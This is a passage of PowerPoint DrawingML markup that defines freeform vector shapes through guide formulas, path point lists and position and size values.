                  <a:gd name="T7" fmla="*/ 310 h 505"/>
                  <a:gd name="T8" fmla="*/ 110 w 584"/>
                  <a:gd name="T9" fmla="*/ 325 h 505"/>
                  <a:gd name="T10" fmla="*/ 116 w 584"/>
                  <a:gd name="T11" fmla="*/ 347 h 505"/>
                  <a:gd name="T12" fmla="*/ 136 w 584"/>
                  <a:gd name="T13" fmla="*/ 368 h 505"/>
                  <a:gd name="T14" fmla="*/ 168 w 584"/>
                  <a:gd name="T15" fmla="*/ 378 h 505"/>
                  <a:gd name="T16" fmla="*/ 200 w 584"/>
                  <a:gd name="T17" fmla="*/ 378 h 505"/>
                  <a:gd name="T18" fmla="*/ 310 w 584"/>
                  <a:gd name="T19" fmla="*/ 478 h 505"/>
                  <a:gd name="T20" fmla="*/ 263 w 584"/>
                  <a:gd name="T21" fmla="*/ 494 h 505"/>
                  <a:gd name="T22" fmla="*/ 189 w 584"/>
                  <a:gd name="T23" fmla="*/ 504 h 505"/>
                  <a:gd name="T24" fmla="*/ 153 w 584"/>
                  <a:gd name="T25" fmla="*/ 498 h 505"/>
                  <a:gd name="T26" fmla="*/ 89 w 584"/>
                  <a:gd name="T27" fmla="*/ 462 h 505"/>
                  <a:gd name="T28" fmla="*/ 37 w 584"/>
                  <a:gd name="T29" fmla="*/ 394 h 505"/>
                  <a:gd name="T30" fmla="*/ 21 w 584"/>
                  <a:gd name="T31" fmla="*/ 357 h 505"/>
                  <a:gd name="T32" fmla="*/ 0 w 584"/>
                  <a:gd name="T33" fmla="*/ 299 h 505"/>
                  <a:gd name="T34" fmla="*/ 0 w 584"/>
                  <a:gd name="T35" fmla="*/ 273 h 505"/>
                  <a:gd name="T36" fmla="*/ 11 w 584"/>
                  <a:gd name="T37" fmla="*/ 226 h 505"/>
                  <a:gd name="T38" fmla="*/ 32 w 584"/>
                  <a:gd name="T39" fmla="*/ 184 h 505"/>
                  <a:gd name="T40" fmla="*/ 63 w 584"/>
                  <a:gd name="T41" fmla="*/ 147 h 505"/>
                  <a:gd name="T42" fmla="*/ 106 w 584"/>
                  <a:gd name="T43" fmla="*/ 116 h 505"/>
                  <a:gd name="T44" fmla="*/ 195 w 584"/>
                  <a:gd name="T45" fmla="*/ 63 h 505"/>
                  <a:gd name="T46" fmla="*/ 294 w 584"/>
                  <a:gd name="T47" fmla="*/ 16 h 505"/>
                  <a:gd name="T48" fmla="*/ 342 w 584"/>
                  <a:gd name="T49" fmla="*/ 5 h 505"/>
                  <a:gd name="T50" fmla="*/ 389 w 584"/>
                  <a:gd name="T51" fmla="*/ 0 h 505"/>
                  <a:gd name="T52" fmla="*/ 436 w 584"/>
                  <a:gd name="T53" fmla="*/ 10 h 505"/>
                  <a:gd name="T54" fmla="*/ 478 w 584"/>
                  <a:gd name="T55" fmla="*/ 31 h 505"/>
                  <a:gd name="T56" fmla="*/ 499 w 584"/>
                  <a:gd name="T57" fmla="*/ 47 h 505"/>
                  <a:gd name="T58" fmla="*/ 536 w 584"/>
                  <a:gd name="T59" fmla="*/ 89 h 505"/>
                  <a:gd name="T60" fmla="*/ 557 w 584"/>
                  <a:gd name="T61" fmla="*/ 121 h 505"/>
                  <a:gd name="T62" fmla="*/ 583 w 584"/>
                  <a:gd name="T63" fmla="*/ 200 h 505"/>
                  <a:gd name="T64" fmla="*/ 583 w 584"/>
                  <a:gd name="T65" fmla="*/ 221 h 505"/>
                  <a:gd name="T66" fmla="*/ 562 w 584"/>
                  <a:gd name="T67" fmla="*/ 304 h 505"/>
                  <a:gd name="T68" fmla="*/ 536 w 584"/>
                  <a:gd name="T69" fmla="*/ 341 h 505"/>
                  <a:gd name="T70" fmla="*/ 499 w 584"/>
                  <a:gd name="T71" fmla="*/ 373 h 505"/>
                  <a:gd name="T72" fmla="*/ 400 w 584"/>
                  <a:gd name="T73" fmla="*/ 436 h 505"/>
                  <a:gd name="T74" fmla="*/ 236 w 584"/>
                  <a:gd name="T75" fmla="*/ 200 h 505"/>
                  <a:gd name="T76" fmla="*/ 431 w 584"/>
                  <a:gd name="T77" fmla="*/ 257 h 505"/>
                  <a:gd name="T78" fmla="*/ 447 w 584"/>
                  <a:gd name="T79" fmla="*/ 247 h 505"/>
                  <a:gd name="T80" fmla="*/ 462 w 584"/>
                  <a:gd name="T81" fmla="*/ 231 h 505"/>
                  <a:gd name="T82" fmla="*/ 473 w 584"/>
                  <a:gd name="T83" fmla="*/ 200 h 505"/>
                  <a:gd name="T84" fmla="*/ 473 w 584"/>
                  <a:gd name="T85" fmla="*/ 178 h 505"/>
                  <a:gd name="T86" fmla="*/ 467 w 584"/>
                  <a:gd name="T87" fmla="*/ 163 h 505"/>
                  <a:gd name="T88" fmla="*/ 441 w 584"/>
                  <a:gd name="T89" fmla="*/ 137 h 505"/>
                  <a:gd name="T90" fmla="*/ 426 w 584"/>
                  <a:gd name="T91" fmla="*/ 131 h 505"/>
                  <a:gd name="T92" fmla="*/ 404 w 584"/>
                  <a:gd name="T93" fmla="*/ 126 h 505"/>
                  <a:gd name="T94" fmla="*/ 368 w 584"/>
                  <a:gd name="T95" fmla="*/ 137 h 505"/>
                  <a:gd name="T96" fmla="*/ 315 w 584"/>
                  <a:gd name="T97" fmla="*/ 157 h 505"/>
                  <a:gd name="T98" fmla="*/ 383 w 584"/>
                  <a:gd name="T99" fmla="*/ 289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84" h="505">
                    <a:moveTo>
                      <a:pt x="200" y="221"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="200" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="304"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="451"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="221"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="431" y="257"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="431" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="257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6" name="Freeform 47"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7273925" y="2662238"/>
                <a:ext cx="212725" cy="177800"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 430 w 589"/>
                  <a:gd name="T1" fmla="*/ 258 h 495"/>
                  <a:gd name="T2" fmla="*/ 461 w 589"/>
                  <a:gd name="T3" fmla="*/ 237 h 495"/>
                  <a:gd name="T4" fmla="*/ 477 w 589"/>
                  <a:gd name="T5" fmla="*/ 205 h 495"/>
                  <a:gd name="T6" fmla="*/ 477 w 589"/>
                  <a:gd name="T7" fmla="*/ 190 h 495"/>
                  <a:gd name="T8" fmla="*/ 472 w 589"/>
                  <a:gd name="T9" fmla="*/ 174 h 495"/>
                  <a:gd name="T10" fmla="*/ 441 w 589"/>
                  <a:gd name="T11" fmla="*/ 137 h 495"/>
                  <a:gd name="T12" fmla="*/ 425 w 589"/>
                  <a:gd name="T13" fmla="*/ 132 h 495"/>
                  <a:gd name="T14" fmla="*/ 398 w 589"/>
                  <a:gd name="T15" fmla="*/ 132 h 495"/>
                  <a:gd name="T16" fmla="*/ 341 w 589"/>
                  <a:gd name="T17" fmla="*/ 147 h 495"/>
                  <a:gd name="T18" fmla="*/ 262 w 589"/>
                  <a:gd name="T19" fmla="*/ 179 h 495"/>
                  <a:gd name="T20" fmla="*/ 184 w 589"/>
                  <a:gd name="T21" fmla="*/ 216 h 495"/>
                  <a:gd name="T22" fmla="*/ 152 w 589"/>
                  <a:gd name="T23" fmla="*/ 237 h 495"/>
                  <a:gd name="T24" fmla="*/ 131 w 589"/>
                  <a:gd name="T25" fmla="*/ 253 h 495"/>
                  <a:gd name="T26" fmla="*/ 110 w 589"/>
                  <a:gd name="T27" fmla="*/ 289 h 495"/>
                  <a:gd name="T28" fmla="*/ 110 w 589"/>
                  <a:gd name="T29" fmla="*/ 305 h 495"/>
                  <a:gd name="T30" fmla="*/ 115 w 589"/>
                  <a:gd name="T31" fmla="*/ 326 h 495"/>
                  <a:gd name="T32" fmla="*/ 136 w 589"/>
                  <a:gd name="T33" fmla="*/ 352 h 495"/>
                  <a:gd name="T34" fmla="*/ 167 w 589"/>
                  <a:gd name="T35" fmla="*/ 363 h 495"/>
                  <a:gd name="T36" fmla="*/ 184 w 589"/>
                  <a:gd name="T37" fmla="*/ 363 h 495"/>
                  <a:gd name="T38" fmla="*/ 262 w 589"/>
                  <a:gd name="T39" fmla="*/ 337 h 495"/>
                  <a:gd name="T40" fmla="*/ 320 w 589"/>
                  <a:gd name="T41" fmla="*/ 462 h 495"/>
                  <a:gd name="T42" fmla="*/ 225 w 589"/>
                  <a:gd name="T43" fmla="*/ 489 h 495"/>
                  <a:gd name="T44" fmla="*/ 147 w 589"/>
                  <a:gd name="T45" fmla="*/ 489 h 495"/>
                  <a:gd name="T46" fmla="*/ 110 w 589"/>
                  <a:gd name="T47" fmla="*/ 473 h 495"/>
                  <a:gd name="T48" fmla="*/ 52 w 589"/>
                  <a:gd name="T49" fmla="*/ 410 h 495"/>
                  <a:gd name="T50" fmla="*/ 26 w 589"/>
                  <a:gd name="T51" fmla="*/ 363 h 495"/>
                  <a:gd name="T52" fmla="*/ 0 w 589"/>
                  <a:gd name="T53" fmla="*/ 268 h 495"/>
                  <a:gd name="T54" fmla="*/ 0 w 589"/>
                  <a:gd name="T55" fmla="*/ 226 h 495"/>
                  <a:gd name="T56" fmla="*/ 15 w 589"/>
                  <a:gd name="T57" fmla="*/ 190 h 495"/>
                  <a:gd name="T58" fmla="*/ 84 w 589"/>
                  <a:gd name="T59" fmla="*/ 116 h 495"/>
                  <a:gd name="T60" fmla="*/ 136 w 589"/>
                  <a:gd name="T61" fmla="*/ 79 h 495"/>
                  <a:gd name="T62" fmla="*/ 204 w 589"/>
                  <a:gd name="T63" fmla="*/ 47 h 495"/>
                  <a:gd name="T64" fmla="*/ 341 w 589"/>
                  <a:gd name="T65" fmla="*/ 0 h 495"/>
                  <a:gd name="T66" fmla="*/ 393 w 589"/>
                  <a:gd name="T67" fmla="*/ 0 h 495"/>
                  <a:gd name="T68" fmla="*/ 441 w 589"/>
                  <a:gd name="T69" fmla="*/ 6 h 495"/>
                  <a:gd name="T70" fmla="*/ 514 w 589"/>
                  <a:gd name="T71" fmla="*/ 53 h 495"/>
                  <a:gd name="T72" fmla="*/ 540 w 589"/>
                  <a:gd name="T73" fmla="*/ 90 h 495"/>
                  <a:gd name="T74" fmla="*/ 567 w 589"/>
                  <a:gd name="T75" fmla="*/ 132 h 495"/>
                  <a:gd name="T76" fmla="*/ 588 w 589"/>
                  <a:gd name="T77" fmla="*/ 216 h 495"/>
                  <a:gd name="T78" fmla="*/ 572 w 589"/>
                  <a:gd name="T79" fmla="*/ 294 h 495"/>
                  <a:gd name="T80" fmla="*/ 556 w 589"/>
                  <a:gd name="T81" fmla="*/ 326 h 495"/>
                  <a:gd name="T82" fmla="*/ 493 w 589"/>
                  <a:gd name="T83" fmla="*/ 378 h 495"/>
                  <a:gd name="T84" fmla="*/ 393 w 589"/>
                  <a:gd name="T85" fmla="*/ 279 h 495"/>
                  <a:gd name="T86" fmla="*/ 430 w 589"/>
                  <a:gd name="T87" fmla="*/ 258 h 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589" h="495">
                    <a:moveTo>
                      <a:pt x="430" y="258"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="430" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="205"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="237"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="190"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="482" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="514" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="540" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="582" y="174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="556" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="493" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="393" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="258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7" name="Freeform 48"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7337425" y="2811463"/>
                <a:ext cx="231775" cy="214312"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 136 w 646"/>
                  <a:gd name="T1" fmla="*/ 441 h 595"/>
                  <a:gd name="T2" fmla="*/ 136 w 646"/>
                  <a:gd name="T3" fmla="*/ 441 h 595"/>
                  <a:gd name="T4" fmla="*/ 94 w 646"/>
                  <a:gd name="T5" fmla="*/ 426 h 595"/>
                  <a:gd name="T6" fmla="*/ 73 w 646"/>
                  <a:gd name="T7" fmla="*/ 415 h 595"/>
                  <a:gd name="T8" fmla="*/ 58 w 646"/>
                  <a:gd name="T9" fmla="*/ 404 h 595"/>
                  <a:gd name="T10" fmla="*/ 58 w 646"/>
                  <a:gd name="T11" fmla="*/ 404 h 595"/>
                  <a:gd name="T12" fmla="*/ 31 w 646"/>
                  <a:gd name="T13" fmla="*/ 373 h 595"/>
                  <a:gd name="T14" fmla="*/ 15 w 646"/>
                  <a:gd name="T15" fmla="*/ 331 h 595"/>
                  <a:gd name="T16" fmla="*/ 15 w 646"/>
                  <a:gd name="T17" fmla="*/ 331 h 595"/>
                  <a:gd name="T18" fmla="*/ 5 w 646"/>
                  <a:gd name="T19" fmla="*/ 300 h 595"/>
                  <a:gd name="T20" fmla="*/ 0 w 646"/>
                  <a:gd name="T21" fmla="*/ 273 h 595"/>
                  <a:gd name="T22" fmla="*/ 5 w 646"/>
                  <a:gd name="T23" fmla="*/ 247 h 595"/>
                  <a:gd name="T24" fmla="*/ 11 w 646"/>
                  <a:gd name="T25" fmla="*/ 221 h 595"/>
                  <a:gd name="T26" fmla="*/ 11 w 646"/>
                  <a:gd name="T27" fmla="*/ 221 h 595"/>
                  <a:gd name="T28" fmla="*/ 26 w 646"/>
                  <a:gd name="T29" fmla="*/ 200 h 595"/>
                  <a:gd name="T30" fmla="*/ 47 w 646"/>
                  <a:gd name="T31" fmla="*/ 179 h 595"/>
                  <a:gd name="T32" fmla="*/ 73 w 646"/>
                  <a:gd name="T33" fmla="*/ 158 h 595"/>
                  <a:gd name="T34" fmla="*/ 110 w 646"/>
                  <a:gd name="T35" fmla="*/ 142 h 595"/>
                  <a:gd name="T36" fmla="*/ 499 w 646"/>
                  <a:gd name="T37" fmla="*/ 0 h 595"/>
                  <a:gd name="T38" fmla="*/ 551 w 646"/>
                  <a:gd name="T39" fmla="*/ 137 h 595"/>
                  <a:gd name="T40" fmla="*/ 189 w 646"/>
                  <a:gd name="T41" fmla="*/ 268 h 595"/>
                  <a:gd name="T42" fmla="*/ 189 w 646"/>
                  <a:gd name="T43" fmla="*/ 268 h 595"/>
                  <a:gd name="T44" fmla="*/ 158 w 646"/>
                  <a:gd name="T45" fmla="*/ 284 h 595"/>
                  <a:gd name="T46" fmla="*/ 136 w 646"/>
                  <a:gd name="T47" fmla="*/ 305 h 595"/>
                  <a:gd name="T48" fmla="*/ 136 w 646"/>
                  <a:gd name="T49" fmla="*/ 305 h 595"/>
                  <a:gd name="T50" fmla="*/ 131 w 646"/>
                  <a:gd name="T51" fmla="*/ 326 h 595"/>
                  <a:gd name="T52" fmla="*/ 136 w 646"/>
                  <a:gd name="T53" fmla="*/ 352 h 595"/>
                  <a:gd name="T54" fmla="*/ 136 w 646"/>
                  <a:gd name="T55" fmla="*/ 352 h 595"/>
                  <a:gd name="T56" fmla="*/ 141 w 646"/>
                  <a:gd name="T57" fmla="*/ 368 h 595"/>
                  <a:gd name="T58" fmla="*/ 152 w 646"/>
                  <a:gd name="T59" fmla="*/ 384 h 595"/>
                  <a:gd name="T60" fmla="*/ 162 w 646"/>
                  <a:gd name="T61" fmla="*/ 394 h 595"/>
